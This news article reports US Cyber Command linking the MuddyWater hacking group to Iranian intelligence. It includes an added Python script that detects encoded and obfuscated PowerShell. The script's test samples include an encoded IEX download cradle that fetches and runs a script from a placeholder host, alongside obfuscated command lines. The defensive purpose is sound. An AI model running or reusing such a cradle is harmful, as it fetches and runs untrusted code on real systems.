
US Cyber Command Links 'MuddyWater' Hacking Group to Iranian Intelligence
2022-01-13 00:16

The U.S. Cyber Command on Wednesday officially confirmed MuddyWater's ties to the Iranian intelligence apparatus, while simultaneously detailing the various tools and tactics adopted by the espionage actor to burrow into victim networks.

"MuddyWater has been seen using a variety of techniques to maintain access to victim networks," USCYBERCOM's Cyber National Mission Force said in a statement.

"These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions."
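The two techniques named in that statement are the ones a defender would most want to catch in process-creation telemetry. The following script is an added example, not code from the article or from any of the organizations it quotes: it takes PowerShell command lines (the three sample lines are constructed for this example, not MuddyWater samples), decodes any `-EncodedCommand` payload from its base64/UTF-16LE form, collapses simple `'a'+'b'` string concatenation, and then checks the resulting text for common obfuscation and download-cradle indicators. Collapsing the concatenation first is what lets the `Invoke-Expression` check fire on the third line, which a plain keyword match would miss.

```python
import base64
import re

# Constructed sample payload and command lines (not taken from the article).
# The second line embeds the payload the way -EncodedCommand expects it:
# UTF-16LE text, base64-encoded.
ENCODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED_BLOB = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "powershell.exe -nop -w hidden -enc " + ENCODED_BLOB,
    "powershell.exe -c \"&('Inv'+'oke-Expr'+'ession') ([char]71+'et-Date')\"",
]

# -EncodedCommand and the abbreviations commonly seen for it, followed by a base64 run.
ENCODED_FLAG = re.compile(
    r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE
)

# Adjacent single-quoted literals joined with '+', e.g. 'Inv'+'oke'.
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

# Heuristic indicators, checked against the de-obfuscated text.
INDICATORS = {
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "base64-decode": re.compile(r"FromBase64String", re.IGNORECASE),
    "download-cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.IGNORECASE
    ),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "char-casting": re.compile(r"\[char\]\s*\d+", re.IGNORECASE),
    "backtick-escapes": re.compile(r"`[a-z]", re.IGNORECASE),
}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64 or not UTF-16LE text: treat as "no decodable payload".
        return None


def collapse_string_concat(text):
    """Repeatedly join 'a'+'b' into 'ab' until no adjacent pair remains."""
    previous = None
    while previous != text:
        previous = text
        text = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


def analyze_command_line(cmdline):
    """Score one command line; returns findings plus any decoded payload."""
    findings = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded-command")
    # Scan the original line and the decoded payload together.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    collapsed = collapse_string_concat(text)
    if collapsed != text:
        findings.append("string-concatenation")
    for name, pattern in INDICATORS.items():
        if pattern.search(collapsed):
            findings.append(name)
    return {"suspicious": bool(findings), "findings": findings, "decoded": decoded}


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = analyze_command_line(line)
        print(result["suspicious"], result["findings"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

The heuristics are deliberately coarse: they flag the encoded-command form and a few cradle and casting idioms, and they would need tuning against an environment's legitimate PowerShell usage before being used to alert.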

Last month, Symantec's Threat Hunter Team publicized findings about a new wave of hacking activity unleashed by the MuddyWater group against a string of telecom operators and IT companies throughout the Middle East and Asia over the previous six months, using a blend of legitimate tools, publicly available malware, and living-off-the-land methods.

"Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques," SentinelOne researcher Amitai Ben Shushan Ehrlich said.

"While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection."


News URL

https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html